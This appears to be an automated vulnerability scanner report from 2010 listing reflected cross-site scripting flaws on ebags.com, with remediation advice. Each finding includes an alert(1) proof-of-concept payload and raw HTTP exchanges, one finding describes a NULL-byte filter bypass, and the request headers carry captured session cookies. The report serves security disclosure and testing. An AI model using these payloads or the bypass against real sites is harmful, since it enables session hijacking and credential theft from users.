ebags.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://www.ebags.com/ [name of an arbitrarily supplied request parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31c8f"><script>alert(1)</script>d599cc43ed4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?31c8f"><script>alert(1)</script>d599cc43ed4=1 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:04:08 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:04:08 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 75114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/index.cfm?31c8f"><script>alert(1)</script>d599cc43ed4=1&quicksignlink=pageend">
...[SNIP]...

1.2. http://www.ebags.com/brands/index.cfm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brands/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 517fa"><script>alert(1)</script>c9c47396fe9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /brands/index.cfm?517fa"><script>alert(1)</script>c9c47396fe9=1 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:06:56 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:06:56 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 280296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/brands/index.cfm?517fa"><script>alert(1)</script>c9c47396fe9=1&quicksignlink=pageend">
...[SNIP]...

1.3. http://www.ebags.com/brands/index.cfm [sub_site_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brands/index.cfm

Issue detail

The value of the sub_site_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 923c4"><script>alert(1)</script>1dc246df464 was submitted in the sub_site_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /brands/index.cfm?sub_site_id=49923c4"><script>alert(1)</script>1dc246df464 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:00 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:00 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 43301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/brands/index.cfm?sub_site_id=49923c4"><script>alert(1)</script>1dc246df464&quicksignlink=pageend">
...[SNIP]...

1.4. http://www.ebags.com/help/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/help/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e296c"><script>alert(1)</script>1333b400c65 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /help/?e296c"><script>alert(1)</script>1333b400c65=1 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:05:27 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 14:05:27 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 47241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/help/index.cfm?e296c"><script>alert(1)</script>1333b400c65=1&quicksignlink=pageend">
...[SNIP]...

1.5. http://www.ebags.com/help/index.cfm [HelpCenter_Link parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/help/index.cfm

Issue detail

The value of the HelpCenter_Link request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81f28"><script>alert(1)</script>552f3115918 was submitted in the HelpCenter_Link parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /help/index.cfm?fuseaction=suggest&HelpCenter_Link=Suggestions81f28"><script>alert(1)</script>552f3115918 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:05:38 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 14:05:38 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 45466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/help/index.cfm?fuseaction=suggest&HelpCenter_Link=Suggestions81f28"><script>alert(1)</script>552f3115918&quicksignlink=pageend">
...[SNIP]...

1.6. http://www.ebags.com/help/index.cfm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/help/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43aea"><script>alert(1)</script>e2a6fc36772 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /help/index.cfm?43aea"><script>alert(1)</script>e2a6fc36772=1 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:05:03 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822CB96B272DALERT281292D27C04ABDB9AA2; expires=Sun, 02-Jan-2011 14:05:03 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 47279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/help/index.cfm?43aea"><script>alert(1)</script>e2a6fc36772=1&quicksignlink=pageend">
...[SNIP]...

1.7. http://www.ebags.com/members/index.cfm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/members/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dda0a"><script>alert(1)</script>9e2f7f5dbc0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /members/index.cfm?dda0a"><script>alert(1)</script>9e2f7f5dbc0=1 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:03:56 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:03:56 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 45916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/members/index.cfm?dda0a"><script>alert(1)</script>9e2f7f5dbc0=1&quicksignlink=pageend">
...[SNIP]...

1.8. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830 [&sourceID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/product/case-logic/sony-psp-game-case/120830

Issue detail

The value of the &sourceID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89008"-alert(1)-"e04fbf12b01 was submitted in the &sourceID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /product/case-logic/sony-psp-game-case/120830?&sourceID=BECOME01$couponid=40959822productid=89008"-alert(1)-"e04fbf12b01 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:04:05 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D89008%2DALERT%281%29%2DE04FBF12B01; expires=Sun, 02-Jan-2011 14:04:05 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 76521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h
...[SNIP]...
hfComparisonChartSkuId").get(0).value=skuid;$("#hfComparisonReturnUrl").get(0).value="http://www.ebags.com:80/product/case-logic/sony-psp-game-case/120830?&sourceID=BECOME01$couponid=40959822productid=89008"-alert(1)-"e04fbf12b01productid="+skuid;});(function($,eBags){var txtPostalCode=$("#txtPostalCode"),divEddResult=$("#divEddResult"),divEddError=$("#divEddError"),divEddProcessing=$("#divEddProcessing")
doneProcessing=false,
...[SNIP]...

1.9. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/product/case-logic/sony-psp-game-case/120830

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00e855f"-alert(1)-"ff69dd32d95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e855f"-alert(1)-"ff69dd32d95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /product/case-logic/sony-psp-game-case/120830?&sourceID=BECOME01$couponid=40959822productid=&%00e855f"-alert(1)-"ff69dd32d95=1 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:05:05 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 14:05:05 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 76567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h
...[SNIP]...
mparisonChartSkuId").get(0).value=skuid;$("#hfComparisonReturnUrl").get(0).value="http://www.ebags.com:80/product/case-logic/sony-psp-game-case/120830?&sourceID=BECOME01$couponid=40959822productid=&%00e855f"-alert(1)-"ff69dd32d95=1productid="+skuid;});(function($,eBags){var txtPostalCode=$("#txtPostalCode"),divEddResult=$("#divEddResult"),divEddError=$("#divEddError"),divEddProcessing=$("#divEddProcessing")
doneProcessing=fals
...[SNIP]...

1.10. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/product/case-logic/sony-psp-game-case/120830

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22488"-alert(1)-"de7d1c87b4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /product/case-logic/sony-psp-game-case/120830?productid=1312640&sourceID=BECOME01$couponid=40959822&22488"-alert(1)-"de7d1c87b4f=1 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 14:00:22 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: CFID=723756; domain=.ebags.com; expires=Tue, 24-Dec-2019 14:00:22 GMT; path=/
Set-Cookie: CFTOKEN=74455619; domain=.ebags.com; expires=Tue, 24-Dec-2019 14:00:22 GMT; path=/
